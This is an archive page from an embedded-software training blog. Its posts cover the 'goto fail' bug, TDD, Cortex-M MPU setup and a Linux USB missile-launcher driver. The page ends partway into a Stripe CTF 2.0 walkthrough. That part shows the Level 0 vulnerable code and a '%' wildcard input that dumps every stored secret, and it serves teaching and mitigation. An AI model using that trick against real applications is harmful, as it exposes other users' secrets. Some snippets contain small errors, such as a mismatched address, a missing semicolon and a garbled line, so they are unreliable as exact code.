You are currently browsing the archives for the Testing category.

goto fail and embedded C Compilers

February 27th, 2014

I can’t imagine anyone reading this posting hasn’t already read about the Apple “goto fail” bug in SSL. My reaction was one of incredulity; I really couldn’t believe this code could have got into the wild on so many levels.

First we’ve got to consider the testing (or lack thereof) for this codebase. The side effect of the bug was that all SSL certificates passed, even malformed ones. This implies positive testing (i.e. we can demonstrate it works), but no negative testing (i.e. a malformed SSL certificate), or even no dynamic SSL certificate testing at all?

What I haven’t established* is whether the bug came about through code removal (e.g. there was another ‘if’ statement before the second goto) or, due to trial-and-error programming, the extra goto got added (with other code) that then didn’t get removed on a clean-up. There are, of course, some schools of thought that believe it was deliberately put in as part of prism!

Then you have to query regression testing; have they never tested for malformed SSL certificates (I can’t believe that; mind you I didn’t believe Lance was doping!) or did they use a regression-subset for this release which happened to miss this bug? Regression testing vs. product release is always a massive pressure. Automation of regression testing through continuous integration is key, but even so, for very large code bases it is simplistic to say “rerun all tests”; we live in a world of compromises.

Next, if we actually analyse the code then I can imagine the MISRA-C group jumping around saying “look, look, if only they’d followed MISRA-C this couldn’t of happened” (yes Chris, it’s you I’m envisaging) and of course they’re correct. This code breaks a number of MISRA-c:2012 rules, but most notably:

15.6 (Required) The body of an iteration-statement or selection-statement shall be a compound-statement

Which boils down to all if-statements must use a block structure, so the code would go from (ignoring the glaring coding error of two gotos):
Read more »

Test Driven Development (TDD) with the mbed

May 24th, 2013

One of the most useful fallout’s from the acceptance of Agile techniques is the use of Test-Driven-Development (TDD) and the growth of associated test frameworks, such as GoogleTest and CppUTest, etc.

I won’t get into the details of TDD here as they are well covered elsewhere (I recommend James Grenning’s book “Test Driven Development for Embedded C” for a good coverage of the subject area), but the principle is

  1. Write a test
  2. Develop enough code to compile and build (but will fail the test)
  3. Write the application code to pass the test
  4. repeat until done

Obviously that is massively simplifying the process, but that’s the gist. The key to it all is automation, in that you want to write a new test and then the build-deploy-test-report (BDTR) cycle is automated.

To build a TDD environment with the mbed I needed to solve the following obstacles:

  1. Build – Using a TDD framework and building the project
  2. Deploy –  Download to the mbed
  3. Test – auto-executing the test code on the mbed
  4. Report –  Getting test reports back from the mbed to the host

Read more »

Setting up the Cortex-M3/4 (ARMv7-M) Memory Protection Unit (MPU)

February 25th, 2013

An optional part of the ARMv7-M architecture is the support of a Memory Protection Unit (MPU). This is a fairly simplistic device (compared to a fully blow Memory Management Unit (MMU) as found on the Cortex-A family), but if available can be programmed to help capture illegal or dangerous memory accesses.
When first looking at programming the MPU it may seem rather daunting, but in reality it is very straightforward. The added benefit of the ARMv7-M family is the well-defined memory map.
All example code is based around an NXP LPC1768 and Keil uVision v4.70 development environment. However as all examples are built using CMSIS, then they should work on an Cortex-M3/4 supporting the MPU.
First, let’s take four types of memory access we may want to capture or inhibit:

  1. Tying to read at an address that is reserved in the memory map (i.e. no physical memory of any type there)
  2. Trying to write to Flash/ROM
  3. Stopping areas of memory being accessible
  4. Disable running code located in SRAM (eliminating potential exploit)

Before we start we need to understand the microcontrollers memory map, so here we can look at the memory map of the NXP LPC1768 as defined in chapter 2 of the LPC17xx User Manual (UM10360).

  • 512kB FLASH @ 0x0000 0000 – 0x0007 FFFF
  • 32kB on-chip SRAM @ 0x1000 0000 – 0x1000 7FFFF
  • 8kB boot ROM @ 0x1FFF 0000 – 0x1FFF 1FFF
  • 32kB on-chip SRAM @ 0x2007 C000 [AHB SRAM]
  • GPIO @ 0x2009C000 – 0x2009 FFFF
  • APB Peripherals  @ 0x4000 0000 – 0x400F FFFF
  • AHB Peripheral @ 0x5000 0000 – 0x501F FFFF
  • Private Peripheral Bus @ 0xE000 0000 – 0xE00F FFFF

Based on the above map we can set up four tests:

  1. Read from location 0x0008 0000 – this is beyond Flash in a reserved area of memory
  2. Write to location 0x0000 4000 – some random loaction in the flash region
  3. Read the boot ROM at 0x1FFF 0000
  4. Construct a function in SRAM and execute it

The first three tests are pretty easy to set up using pointer indirection, e.g.:

int* test1 = (int*)0x000004000;   // reserved location
x= *test1;                        // try to read from reserved location
int* test2 = (int*)0x000004000;   // flash location
*test2 = x;                       // try to write to flash
int* test3 = (int*)0x1fff0000 ;   // Boot ROM location
x = *test3 ;                      // try to read from boot ROM

The fourth takes a little more effort, e.g.

// int func(int r0)
// {
//    return r0+1;
// }
uint16_t func[] = { 0x4601, 0x1c48, 0x4770 };
int main(void)
{
   funcPtr test4= (funcPtr)(((uint32_t)func)+1);  // setup RAM function (+1 for thumb)
   x = test4(x);                                  // call ram function
   while(1);
}

Default Behavior

Without the MPU setup the following will happen (output from the previous Fault Handler project):

  • test1 will generate a precise bus error

f1

  • test2 will generate an imprecise bus error

f2

Test3 and test4 will run without any fault being generated.

Setting up the MPU

There are a lot of options when setting up the MPU, but 90% of the time a core set are sufficient. The ARMv7-M MPU supports up to 8 different regions (an address range) that can be individually configured. For each region the core choices are:

  • the start address (e.g. 0x10000000)
  •  the size (e.g. 32kB)
  •  Access permissions (e.g. Read/Write access)
  • Memory type (here we’ll limit to either Normal for Flash/SRAM, Device for NXP peripherals, and Strongly Ordered for the private peripherals)
  • Executable or not (refereed to a Execute Never [XN] in MPU speak)

Both access permissions and memory types have many more options than those covered here, but for the majority of cases these will suffice. Here I’m not intending to cover privileged/non-privileged options (don’t worry if that doesn’t make sense, I shall cover it in a later posting).
Based on our previous LPC1768 memory map we could define as region map thus:

No.  Memory             Address       Type      Access Permissions  Size
0    Flash              0x00000000    Normal    Full access, RO    512KB
1    SRAM               0x10000000    Normal    Full access, RW     32KB
2    SRAM               0x2007C000    Normal    Full access, RW     32KB
3    GPIO               0x2009C000    Device    Full access, RW     16KB
4    APB Peripherals    0x40000000    Device    Full access, RW    512KB
5    AHB Peripherals    0x50000000    Device    Full access, RW      2MB
6    PPB                0xE0000000    SO        Full access, RW      1MB

Not that the boot ROM has not been explicitly mapped. This means any access to that region once the MPU has been initialized will get caught as a memory access violation.
To program a region, we need to write to two registers in order:

  • MPU Region Base Address Register (CMSIS: SCB->RBAR)
  • MPU Region Attribute and Size Register (CMSIS: SCB->RASR)

MPU Region Base Address Register

Bits 0..3 specify the region number
Bit 4 needs to be set to make the region valid
bits 5..31 have the base address of the region (note the bottom 5 bits are ignored – base address must also be on a natural boundary, i.e. for a 32kB region the base address must be a multiple of 32kB).

So if we want to program region 1 we would write:

#define VALID 0x10
SCB->RBAR = 0x10000000 | VALID | 1;  // base addr | valid | region no

MPU Region Attribute and Size Register

This is slightly more complex, but the key bits are:

bit 0 – Enable the region
bits 1..5 – region size; where size is used as 2**(size+1)
bits 16..21 – Memory type (this is actually divided into 4 separate groups)
bits 24..26 – Access Privilege
bit 28 – XN

So given the following defines:

#define REGION_Enabled  (0x01)
#define REGION_32K      (14 << 1)      // 2**15 == 32k
#define NORMAL          (8 << 16)      // TEX:0b001 S:0b0 C:0b0 B:0b0
#define FULL_ACCESS     (0x03 << 24)   // Privileged Read Write, Unprivileged Read Write
#define NOT_EXEC        (0x01 << 28)   // All Instruction fetches abort

We can configure region 0 thus:

SCB->RASR = (REGION_Enabled | NOT_EXEC | NORMAL | REGION_32K | FULL_ACCESS);

We can now repeat this for each region, thus:

void lpc1768_mpu_config(void)
{
   /* Disable MPU */
   MPU->CTRL = 0;
   /* Configure region 0 to cover 512KB Flash (Normal, Non-Shared, Executable, Read-only) */
   MPU->RBAR = 0x00000000 | REGION_Valid | 0;
   MPU->RASR = REGION_Enabled | NORMAL | REGION_512K | RO;
   /* Configure region 1 to cover CPU 32KB SRAM (Normal, Non-Shared, Executable, Full Access) */
   MPU->RBAR = 0x10000000 | REGION_Valid | 1;
   MPU->RASR = REGION_Enabled | NOT_EXEC | NORMAL | REGION_32K | FULL_ACCESS;
   /* Configure region 2 to cover AHB 32KB SRAM (Normal, Non-Shared, Executable, Full Access) */
   MPU->RBAR = 0x2007C000 | REGION_Valid | 2;
   MPU->RASR = REGION_Enabled | NOT_EXEC | NORMAL | REGION_32K | FULL_ACCESS;
   /* Configure region 3 to cover 16KB GPIO (Device, Non-Shared, Full Access Device, Full Access) */
   MPU->RBAR = 0x2009C000 | REGION_Valid | 3;
   MPU->RASR = REGION_Enabled |DEVICE_NON_SHAREABLE | REGION_16K | FULL_ACCESS;
   /* Configure region 4 to cover 512KB APB Peripherials (Device, Non-Shared, Full Access Device, Full Access) */
   MPU->RBAR = 0x40000000 | REGION_Valid | 4;
   MPU->RASR = REGION_Enabled | DEVICE_NON_SHAREABLE | REGION_512K | FULL_ACCESS;
   /* Configure region 5 to cover 2MB AHB Peripherials (Device, Non-Shared, Full Access Device, Full Access) */
   MPU->RBAR = 0x50000000 | REGION_Valid | 5;
   MPU->RASR = REGION_Enabled | DEVICE_NON_SHAREABLE | REGION_2M | FULL_ACCESS;
   /* Configure region 6 to cover the 1MB PPB (Privileged, XN, Read-Write) */
   MPU->RBAR = 0xE0000000 | REGION_Valid | 6;
   MPU->RASR = REGION_Enabled |STRONGLY_ORDERED_SHAREABLE | REGION_1M | FULL_ACCESS;
   /* Enable MPU */
   MPU->CTRL = 1;
   __ISB();
   __DSB();
}

After the MPU has been enabled, ISB and DSB barrier calls have been added to ensure that the pipeline is flushed and no further operations are executed until the memory access that enables the MPU completes.

Using the Keil environment, we can examine the MPU configuration:

f3

Rerunning the tests with MPU enabled

To get useful output we can develop a memory fault handler, building on the Hard Fault handler, e.g.

void printMemoryManagementErrorMsg(uint32_t CFSRValue)
{
   printErrorMsg("Memory Management fault: ");
   CFSRValue &= 0x000000FF; // mask just mem faults
   if((CFSRValue & (1<<5)) != 0) {
      printErrorMsg("A MemManage fault occurred during FP lazy state preservation\n");
   }
   if((CFSRValue & (1<<4)) != 0) {
      printErrorMsg("A derived MemManage fault occurred on exception entry\n");
   }
   if((CFSRValue & (1<<3)) != 0) {
      printErrorMsg("A derived MemManage fault occurred on exception return.\n");
   }
   if((CFSRValue & (1<<1)) != 0) {
      printErrorMsg("Data access violation.\n");
   }
   if((CFSRValue & (1<<0)) != 0) {
      printErrorMsg("MPU or Execute Never (XN) default memory map access violation\n");
   }
   if((CFSRValue & (1<<7)) != 0) {
      static char msg[80];
      sprintf(msg, "SCB->MMFAR = 0x%08x\n", SCB->MMFAR );
      printErrorMsg(msg);
   }
}

Test 1 – Reading undefined region

Rerunning test one with the MPU enabled gives the following output:

f4

The SCB->MMFAR contains the address of the memory that caused the access violation, and the PC guides us towards the offending instruction

f5

Test 2 – Writing to RO defined region

f6

f7

Test 3 – Reading Undefined Region (where memory exists)

f8

f9

Test 4 – Executing code in XN marked Region

f10

The PC gives us the location of the code (in SRAM) that tried to be executed

f11

The LR indicates the code where the branch was executed

f12

So, we can see with a small amount of programming we can (a) simplify debugging by quickly being able to establish the offending opcode/memory access, and (b) better defend our code against accidental/malicious access.

Optimizing the MPU programming.

Once useful feature of the Cortex-M3/4 MPU is that the Region Base Address Register and Region Attribute and Size Register are aliased three further times. This means up to 4 regions can be programmed at once using a memcpy. So instead of the repeated writes to RBAR and RASR, we can create configuration tables and initialize the MPU using a simple memcpy, thus:

uint32_t table1[] = {
/* Configure region 0 to cover 512KB Flash (Normal, Non-Shared, Executable, Read-only) */
(0x00000000 | REGION_Valid | 0),
(REGION_Enabled | NORMAL_OUTER_INNER_NON_CACHEABLE_NON_SHAREABLE | REGION_512K | RO),
/* Configure region 1 to cover CPU 32KB SRAM (Normal, Non-Shared, Executable, Full Access) */
(0x10000000 | REGION_Valid | 1),
(REGION_Enabled | NOT_EXEC | NORMAL | REGION_32K | FULL_ACCESS),
/* Configure region 2 to cover AHB 32KB SRAM (Normal, Non-Shared, Executable, Full Access) */
(0x2007C000 | REGION_Valid | 2),
(REGION_Enabled | NOT_EXEC | NORMAL_OUTER_INNER_NON_CACHEABLE_NON_SHAREABLE | REGION_32K | FULL_ACCESS),
/* Configure region 3 to cover 16KB GPIO (Device, Non-Shared, Full Access Device, Full Access) */
(0x2009C000 | REGION_Valid | 3),
(REGION_Enabled | DEVICE_NON_SHAREABLE | REGION_16K | FULL_ACCESS)
};

uint32_t table2[] = {
/* Configure region 4 to cover 512KB APB Peripherials (Device, Non-Shared, Full Access Device, Full Access) */
(0x40000000 | REGION_Valid | 4),
(REGION_Enabled | DEVICE_NON_SHAREABLE | REGION_512K | FULL_ACCESS),
/* Configure region 5 to cover 2MB AHB Peripherials (Device, Non-Shared, Full Access Device, Full Access) */
(0x50000000 | REGION_Valid | 5),
(REGION_Enabled | DEVICE_NON_SHAREABLE | REGION_2M | FULL_ACCESS),
/* Configure region 6 to cover the 1MB PPB (Privileged, XN, Read-Write) */
(0xE0000000 | REGION_Valid | 6),
(REGION_Enabled | NOT_EXEC | DEVICE_NON_SHAREABLE | REGION_1M | P_RW_U_NA),
};

void lpc1768_mpu_config_tbl(void)
{
   /* Disable MPU */
   MPU->CTRL = 0;
   memcpy((void*)&( MPU->RBAR), table1, sizeof(table1));
   memcpy((void*)&( MPU->RBAR), table2, sizeof(table2));
   /* Enable MPU */
   MPU->CTRL = 1;
   __ISB();
   __DSB();
}

I hope this is enough to get you started with your ARMv7-M MPU.

I Dream of a Cheeky Missile Launcher

October 12th, 2012

I read a blog post by Matthias Vallentin a while back about getting a USB missile launcher working and thought that a similar gadget would be a nice candidate for the 2012 refresh of our successful EL503 Developing for Embedded Linux course so ordered a nice looking piece of hardware from Amazon – the Thunder Missile Launcher from Dream Cheeky.

Sadly these guys don’t provide Linux drivers and the hardware wasn’t an exact match for the launcher used in Matthias’ article so I had to do a bit of research.

Normally it would be a case of firing up my Windows partition and using a USB Sniffer but I didn’t want to shutdown my system as I was in the middle of quite a few projects so I hit the net and stumbled across the Retaliation project which used the Thunder Launcher to punish people who broke a CI build and a blog piece by Nathan Milford which had the requisite USB command codes but had programs that leveraged libUSB from userspace.

So now I knew what I had to feed my launcher and had some good resources on Linux USB[1] [2] [3] now I could start!

Echoing Matthias’ steps – I created a simple core driver that would print info out in the probe

/* Rocket launcher specifics */
#define LAUNCHER_VENDOR_ID 0x2123
#define LAUNCHER_PRODUCT_ID 0x1010
#define LAUNCHER_NODE "launcher"

static struct usb_class_driver class;

/* Table of devices that work with this driver */
static struct usb_device_id launcher_table[] =
{
{ USB_DEVICE(LAUNCHER_VENDOR_ID, LAUNCHER_PRODUCT_ID) },
{} /* Terminating entry */
};
MODULE_DEVICE_TABLE (usb, launcher_table);

static struct usb_driver launcher_driver =
{
.name = "launcher_driver",
.id_table = launcher_table,
};

static int launcher_open(struct inode *inodep, struct file *filp)
{
int retval = 0
pr_debug("launcher_open\n");
/* Save our object in the file's private structure. */
/* filp->private_data = dev; */
return retval;
}

static int launcher_close(struct inode *inodep, struct file *filp)
{
int retval = 0;
pr_debug("launcher_close\n");
/* We can get private data from filp->private_data; */
return retval;
}

static ssize_t launcher_read(struct file *f, char __user *buf, size_t cnt,
loff_t *off)
{
int retval = -EFAULT;
pr_debug("launcher_read\n");
return retval;
}

static ssize_t launcher_write(struct file *filp, const char __user *user_buf,
size_t count, loff_t *off)
{
int retval = -EFAULT;
pr_debug("launcher_write\n");
/* We can get private data from filp->private_data; */
return retval;
}

static struct file_operations fops =
{
.open = launcher_open,
.release = launcher_close,
.read = launcher_read,
.write = launcher_write,
};

static int launcher_probe(struct usb_interface *interface, const struct usb_device_id *id)
{
struct usb_device *udev = interface_to_usbdev(interface);
struct usb_host_interface *iface_desc;
int retval = -ENODEV;

pr_debug("launcher_probe\n");

/* Set up our class */
class.name = LAUNCHER_NODE"%d";
class.fops = &fops;

if ((retval = usb_register_dev(interface, &class)) minor);
}
/* This will be our private interface device data instead of NULL eventually */
/* usb_set_intfdata(interface, NULL); */
return retval;
}

static void launcher_disconnect(struct usb_interface *interface)
{
pr_debug("launcher_disconnect\n");
/* Give back our minor. */
usb_deregister_dev(interface, &class);
}

static int __init launcher_init(void)
{
int result;
pr_debug("launcher_disconnect\n");

/* Wire up our probe/disconnect */
launcher_driver.probe = launcher_probe;
launcher_driver.disconnect = launcher_disconnect;

/* Register this driver with the USB subsystem */
if ((result = usb_register(&launcher_driver))) {
pr_err("usb_register() failed. Error number %d", result);
}
return result;
}

static void __exit launcher_exit(void)
{
/* Deregister this driver with the USB subsystem */
usb_deregister(&launcher_driver);
}

module_init(launcher_init);
module_exit(launcher_exit);

I compiled this with the makefile, inserted the module and saw that my init call had successfully been called so I popped the launchers USB into my laptop and…. nothing.

I checked dmesg and saw it had been claimed by hid-generic, part of the usbhid module on my laptop!


[205211.636201] usb 2-1.2: >USB disconnect, device number 23
[205214.371289] usb 2-1.2: >new low-speed USB device number 24 using ehci_hcd
[205214.462969] usb 2-1.2: >New USB device found, idVendor=2123, idProduct=1010
[205214.462979] usb 2-1.2: >New USB device strings: Mfr=1, Product=2, SerialNumber=0
[205214.462985] usb 2-1.2: >Product: USB Missile Launcher
[205214.462990] usb 2-1.2: >Manufacturer: Syntek
[205214.468668] hid-generic 0003:2123:1010.000B: >hiddev0,hidraw0: USB HID v1.10 Device [Syntek USB Missile Launcher] on usb-0000:00:1d.0-1.2/input0

To get hidusb to release it, you can tell it to unbind using sysfs.


[nick@slimtop ~]$ ls /sys/bus/usb/drivers/usbhid/
2-1.2:1.0 bind module new_id remove_id uevent unbind
^^^ Our address
[nick@slimtop ~] sudo sh -c 'echo 2-1.2:1.0 > /sys/bus/usb/drivers/usbhid/unbind'
[nick@slimtop ~]$ ls
bind module new_id remove_id uevent unbind

To get it to bind to our driver we would have to poke it manually

[nick@slimtop ~]$ sudo sh -c 'echo "2-1.2:1.0" > /sys/bus/usb/drivers/launcher_driver/bind'

Checking dmesg again showed that the probe function had been called and we had our /dev/launcher0!

I now needed to update the information expected by the driver. The original launcher used by Matthias’ had different codes for most of the commmands so using the userspace information we could update the command codes and tweak the control codes.

#define LAUNCHER_NODE "launcher"
#define LAUNCHER_CTRL_BUFFER_SIZE 8
#define LAUNCHER_CTRL_REQUEST_TYPE 0x21
#define LAUNCHER_CTRL_REQUEST 0x09
#define LAUNCHER_CTRL_VALUE 0x0
#define LAUNCHER_CTRL_INDEX 0x0
#define LAUNCHER_CTRL_COMMAND_PREFIX 0x02

#define LAUNCHER_STOP 0x20
#define LAUNCHER_UP 0x02
#define LAUNCHER_DOWN 0x01
#define LAUNCHER_LEFT 0x04
#define LAUNCHER_RIGHT 0x08
#define LAUNCHER_UP_LEFT (LAUNCHER_UP | LAUNCHER_LEFT)
#define LAUNCHER_DOWN_LEFT (LAUNCHER_DOWN | LAUNCHER_LEFT)
#define LAUNCHER_UP_RIGHT (LAUNCHER_UP | LAUNCHER_RIGHT)
#define LAUNCHER_DOWN_RIGHT (LAUNCHER_DOWN | LAUNCHER_RIGHT)
#define LAUNCHER_FIRE 0x10

Our USB command code takes the form of:
REQUEST_TYPE | REQUEST | VALUE | INDEX | DATA
where DATA is an 8 byte buffer with the first set to 0x8, our COMMAND_PREFIX.

For example, to send a fire command (0x10) we would use a usb_control_msg like this

int usb_control_msg ( struct usb_device *dev,
unsigned int pipe,
0x09, // Request
0x21, // Request Type
0x0, // Value
0x0, // Index
&buffer, // Buffer
sizeof(buffer), // Length of buffer
int timeout);

where buffer would be a blank char buffer of 8 bytes with the first and second bytes set to the COMMAND_PREFIX and command code respectively which you can see in this snipped from our launcher_write() function

...
if (copy_from_user(&cmd, user_buf, count)) {
retval = -EFAULT;
goto unlock_exit;
}

/* Prepare the buffer, noting the prefix */
memset(&buf, 0, sizeof(buf));
buf[0] = LAUNCHER_CTRL_COMMAND_PREFIX;
buf[1] = cmd;

/* The interrupt-in-endpoint handler also modifies dev->command. */
spin_lock(&dev->cmd_spinlock);
dev->command = cmd;
spin_unlock(&dev->cmd_spinlock);

pr_debug("Sending usb_control_message()\n");
retval = usb_control_msg(dev->udev,
usb_sndctrlpipe(dev->udev, 0),
LAUNCHER_CTRL_REQUEST,
LAUNCHER_CTRL_REQUEST_TYPE,
LAUNCHER_CTRL_VALUE,
LAUNCHER_CTRL_INDEX,
&buf,
sizeof(buf),
HZ*5);
...

I won’t cover too much on the USB code as it is covered in far more depth in Matthias’ article and Greg KHs usb-skeleton.c in the kernel source tree.

To control our driver, we can send bytes from userspace to the /dev/launcher0 entry and I was able to repurpose Matthias’ launcher program to send the correct command codes to the device which I have added to the Git repository. When you create the executable and module using make, and assuming you have the right libraries, you will have a launcher_driver.ko and a launcher_control executable.

Insert the kernel module using insmod ./launcher_driver.ko and you can then start issuing commands to the launcher.

Unfortunately by default, the device node /dev/launcher0 is created as root:root with permission 0600 which means that you can either chmod/chgrp it or run the launcher as root(!) which is the simplest test:

sudo ./launcher_control -f

usbhid and the Handsy Driver

As we’ve looked at, usbhid tries to claim our device by default due to it looking like a Human Interface Device and I had to do a fair amount of digging to find out how to stop usbhid from claiming our device which I’ll recap for those who seek enlightenment.

If you look in the source code for /drivers/usb/usbhid/hid-quirks.c we can see a structure that defines a blacklist of HID devices.

static const struct hid_blacklist {
__u16 idVendor;
__u16 idProduct;
__u32 quirks;
} hid_blacklist[] = {
{ USB_VENDOR_ID_AASHIMA, USB_DEVICE_ID_AASHIMA_GAMEPAD, HID_QUIRK_BADPAD },
{ USB_VENDOR_ID_AASHIMA, USB_DEVICE_ID_AASHIMA_PREDATOR, HID_QUIRK_BADPAD },
{ USB_VENDOR_ID_ALPS, USB_DEVICE_ID_IBM_GAMEPAD, HID_QUIRK_BADPAD },
...
{ USB_VENDOR_ID_WISEGROUP_LTD2, USB_DEVICE_ID_SMARTJOY_DUAL_PLUS, HID_QUIRK_NOGET | HID_QUIRK_MULTI_INPUT },
...

This shows a format of VENDOR_ID, DEVICE_ID and the HID_QUIRK mode which can be multiple values OR’d together and if we look further down the source, we can see the following function:

int usbhid_quirks_init(char **quirks_param)
{
u16 idVendor, idProduct;
u32 quirks;
int n = 0, m;
for (; n < MAX_USBHID_BOOT_QUIRKS && quirks_param[n]; n++) {
m = sscanf(quirks_param[n], "0x%hx:0x%hx:0x%x",
&idVendor, &idProduct, &quirks);
if (m != 3 ||
usbhid_modify_dquirk(idVendor, idProduct, quirks) != 0) {
printk(KERN_WARNING
"Could not parse HID quirk module param %s\n",
quirks_param[n]);
}
}
return 0;
}

Which is an array passed in from hid-core.c in the following snippet:

/* Quirks specified at module load time */
static char *quirks_param[MAX_USBHID_BOOT_QUIRKS] = { [ 0 ... (MAX_USBHID_BOOT_QUIRKS - 1) ] = NULL };
module_param_array_named(quirks, quirks_param, charp, NULL, 0444);
MODULE_PARM_DESC(quirks, "Add/modify USB HID quirks by specifying "
" quirks=vendorID:productID:quirks"
" where vendorID, productID, and quirks are all in"
" 0x-prefixed hex");

This shows us that the quirk param values are read in the form of 0xVENDORID:0xPRODUCTID:0xQUIRKS so now we know how to get usbhid to use a quirk for our device, we need to know which one.

Defined in include/linux/hid.h are our quirks, we want to tell usbhid to just leave it alone so we’re going to use HID_QUIRK_IGNORE which has the value of 0x04.

Once we have this information we should be able to modprobe -r usbhid && modprobe usbhid quirks=0x2123:0x1010:0x04 … except that we can’t remove the module on our Fedora system…

[nick@slimtop ~]$ modprobe -r usbhid
FATAL: Module usbhid is builtin.

Oh dear. This means that the usbhid module isn’t loaded at runtime, instead it has been built into the kernel so we can’t change it from userspace as the kernel, with usbhid, is already running before the filesystem has been mounted so we will need to pass the parameter to the kernel in the form:
module.parameter=OPTIONS.
To do this, I edited my kernel command in /boot/grub2/grub.cfg to tell the builtin module about our device and add it to the quirks list.


...
echo 'Loading Fedora (3.6.2-4.fc17.i686)'
linux /vmlinuz-3.6.2-4.fc17.i686 root=/dev/mapper/vg_slimtop-lv_root ro rd.md=0 rd.dm=0 rd.lvm.lv=vg_slimtop/lv_root SYSFONT=True usbhid.quirks=0x2123:0x1010:0x04 KEYTABLE=uk rd.luks=0 rd.lvm.lv=vg_slimtop/lv_swap LANG=en_US.UTF-8 rhgb quiet
...

Finally, we can get our kernel module to load automatically by copying our launcher_driver.ko into the /lib/modules/`uname -r`/ directory and running depmod -a.

On rebooting, you should be able to insert your launcher and up will pop a /dev/launcher0 without usbhid getting handsy with it.

udev

udev is the device manager for the Linux kernel. Primarily, it manages device nodes in /dev so we’re going to use that to manipulate the creation of our /dev/launcher0 entry.

There is a lot of information spread over the net on udev but it’s sometimes out of date and no longer relevant. It’s best to ask questions in IRC, copy existing rules (see /usr/lib/udev/rules.d/*) or just read the source to get the most up-to-date information.

To avoid having to run our launcher as root we can create a special rule for udev[1] to manipulate how the node is created. To do this you will need to create a new file in /etc/udev/rules.d/10-dreamcheeky.rules containing the following:


KERNEL=="launcher?*",MODE="0666",GROUP="wheel"

This tells udev that we want any events from the KERNEL that match /dev/”launcher?*” which is what our driver requests (the regular expression matches any number after our launcher string, such as 1,2,3 etc).
When that event KEY has been matched, we apply the two ASSIGN values which specify the permissions mode, 0666 or rw-rw-rw-, and that it should belong to the wheel group.

To test our rule, we need to know how udev sees our USB device so we do the following:

[nick@slimtop ~]$ find /sys/devices/ -name launcher0
/sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/usbmisc/launcher0

To test our udev rule we run udevadm test as follows against our device path

[nick@slimtop rules.d]$ sudo udevadm test /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/usbmisc/launcher0
run_command: calling: test
adm_test: version 182
This program is for debugging only, it does not run any program,
specified by a RUN key. It may show incorrect results, because
some values may be different, or not available at a simulation run.

builtin_kmod_init: load module index
...
parse_file: reading '/etc/udev/rules.d/10-dreamcheeky.rules' as rules file <--- OUR RULES FILE
...
parse_file: reading '/usr/lib/udev/rules.d/99-systemd.rules' as rules file
udev_rules_new: rules use 249228 bytes tokens (20769 * 12 bytes), 42425 bytes buffer
udev_rules_new: temporary index used 76720 bytes (3836 * 20 bytes)
udev_device_new_from_syspath: device 0xb9009810 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/usbmisc/launcher0'
udev_device_new_from_syspath: device 0xb9009b00 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/usbmisc/launcher0'
udev_device_read_db: device 0xb9009b00 filled with db file data
udev_rules_apply_to_event: GROUP 10 /etc/udev/rules.d/10-dreamcheeky.rules:1
udev_rules_apply_to_event: MODE 0666 /etc/udev/rules.d/10-dreamcheeky.rules:1
udev_device_new_from_syspath: device 0xb901a540 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0'
udev_device_new_from_syspath: device 0xb901a088 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2'
udev_device_new_from_syspath: device 0xb90239b0 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-1'
udev_device_new_from_syspath: device 0xb9023cb0 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2'
udev_device_new_from_syspath: device 0xb9024000 has devpath '/devices/pci0000:00/0000:00:1d.0'
udev_device_new_from_syspath: device 0xb901f220 has devpath '/devices/pci0000:00'
udev_device_read_db: no db file to read /run/udev/data/+usb:2-1.2:1.0: No such file or directory
udev_node_add: handling device node '/dev/launcher0', devnum=c180:0, mode=0666, uid=0, gid=10
node_fixup: preserve permissions /dev/launcher0, 020666, uid=0, gid=10
node_symlink: preserve already existing symlink '/dev/char/180:0' to '../launcher0'
udev_device_update_db: created empty file '/run/udev/data/c180:0' for '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/usbmisc/launcher0'
ACTION=add
DEVNAME=/dev/launcher0
DEVPATH=/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/usbmisc/launcher0
MAJOR=180
MINOR=0
SUBSYSTEM=usbmisc
UDEV_LOG=6
USEC_INITIALIZED=684838211
builtin_kmod_exit: unload module index

That’s it – you should be able to remove/insert your USB device and have /dev/launcher0 show up with the permissions and group you chose.

Conclusion

This has been a very long blog article but I hope this is helpful and serves to tie together a lot of good resources that seem spread thinly across the net so have fun and experiment!

The code for the userspace and driver is available on our Feabhas Github at https://github.com/feabhas/dreamlauncher with a single Makefile to build both projects.

I built this on Fedora 17 so your mileage may vary depending on your distribution/environment.

[1] Special thanks go to the #udev IRC channel on freenode (in particular the user falconindy) and these two resource pages:

Capturing the Stripe-d Flag 2.0 – The After Party

August 30th, 2012

Following on from our previous article looking at Stripe’s Capture the Flag 2.0 challenge, Team Feabhas cracked the last of the levels and its members should hopefully be receiving their complementary t-shirts soon.

It has proven to be a popular article with lots of people coming to the blog for solutions and walk-through, and now that the competition has finished we have decided to share the way we approached each of these levels, their solution and the way in which the attack vector can be mitigated.

Level 0

The Brief

We are told that the key to level 1 is stored in the database and we have to ‘crack’ it. Looking at the code we can see that it holds data in a key|value pair but we don’t know the key so we can’t get the value.

app.post('/*', function(req, res) {
        var namespace = req.body['namespace'];
        var secret_name = req.body['secret_name'];
        var secret_value = req.body['secret_value'];

        var query = 'INSERT INTO secrets (key, secret) VALUES (? || "." || ?, ?)';
        db.run(query, namespace, secret_name, secret_value, function(err) {
                if (err) throw err;
                res.header('Content-Type', 'text/html');
                res.redirect(req.path + '?namespace=' + namespace);
         });
});

The Hack

The code provided lists the following function:

app.get('/*', function(req, res) {
  var namespace = req.param('namespace');

  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
             if (err) throw err;

             renderPage(res, {namespace: namespace, secrets: secrets});
           });
  } else {
    renderPage(res, {});
  }
});

When you request this page by performing a GET operation, the SQL query
SELECT * FROM secrets WHERE key LIKE ? || ".%"
is performed. The ? after LIKE in the query is the placeholder for the user submitted data which isn’t sanitised at all. The trick to overcoming this is to use the ‘%’ character as the namespace value which is a MySQL wildcard for pattern matching which turns our statement into:
